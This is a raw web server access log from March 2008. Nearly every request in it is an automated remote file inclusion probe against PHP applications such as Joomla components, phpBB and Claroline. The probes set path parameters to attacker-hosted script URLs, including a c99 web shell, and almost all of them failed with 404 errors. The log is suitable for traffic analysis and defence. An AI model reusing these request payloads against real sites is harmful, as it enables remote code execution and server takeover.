64.33.49.76 - - [02/Mar/2008:06:02:10 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:02:11 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:02:11 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:02:11 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:02:11 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:02:11 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:06:02:41 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:57 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:57 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:58 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:58 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:58 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:06:02:58 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:07 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:08 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:08 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:10 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:11 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:06:03:12 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
60.249.42.221 - - [02/Mar/2008:06:03:17 -0800] "GET //modules/xfsection/modify.php?dir_module=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:06:05:45 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:06:05:45 -0800] "GET /logs/access.log//main.php?pageURL=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:06:05:45 -0800] "GET /logs//main.php?pageURL=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:06:05:47 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:06:05:53 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:06:07:20 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:06:07:21 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
212.34.136.237 - - [02/Mar/2008:06:07:38 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:06:07:39 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:06:07:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:06:07:56 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:06:07:57 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:00 -0800] "GET /logs/access_080131.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:00 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:01 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:01 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:08:01 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:17 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:18 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:18 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:18 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:06:08:18 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.53.58.10 - - [02/Mar/2008:06:08:33 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:08:50 -0800] "GET /mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:08:56 -0800] "GET /logs/access_080208.log//myPHPCalendar/admin.php?cal_dir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:08:56 -0800] "GET //myPHPCalendar/admin.php?cal_dir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:08:57 -0800] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.127.223.39 - - [02/Mar/2008:06:09:02 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:06:09:14 -0800] "GET /logs/access_080215.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [02/Mar/2008:06:10:11 -0800] "GET /logs/access.log//main.php?pageURL=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [02/Mar/2008:06:10:12 -0800] "GET /logs//main.php?pageURL=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.87.155 - - [02/Mar/2008:06:10:32 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.87.155 - - [02/Mar/2008:06:10:33 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:06:10:57 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:06:10:57 -0800] "GET //administrator/components/com_mgm/help.mgm.php?&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:06:10:58 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:06:10:58 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:11:04 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:06:11:32 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:06:11:32 -0800] "GET /logs/access_080215.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:06:11:32 -0800] "GET /logs/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:06:11:35 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:06:11:38 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:06:12:06 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:06:12:06 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:06:12:07 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:06:12:08 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:06:12:08 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.90 - - [02/Mar/2008:06:12:50 -0800] "GET /logs/access_071130.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avisosgratis.com.ar/data/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.135.90 - - [02/Mar/2008:06:12:50 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avisosgratis.com.ar/data/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.135.90 - - [02/Mar/2008:06:12:50 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avisosgratis.com.ar/data/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:06:12:56 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:06:12:57 -0800] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
194.126.239.14 - - [02/Mar/2008:06:13:11 -0800] "GET /logs/access_080126.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.135.90 - - [02/Mar/2008:06:13:20 -0800] "GET /logs/access_071219.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avisosgratis.com.ar/data/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:06:13:41 -0800] "GET /logs/access_080131.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:14:00 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.119 - - [02/Mar/2008:06:14:22 -0800] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:14:27 -0800] "GET /mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [02/Mar/2008:06:14:42 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:06:15:12 -0800] "GET /logs/access_080126.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:06:15:36 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:06:15:36 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:06:16:04 -0800] "GET /logs/access_080126.log//modules/My_eGallery/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:06:16:04 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.240 - - [02/Mar/2008:06:16:04 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
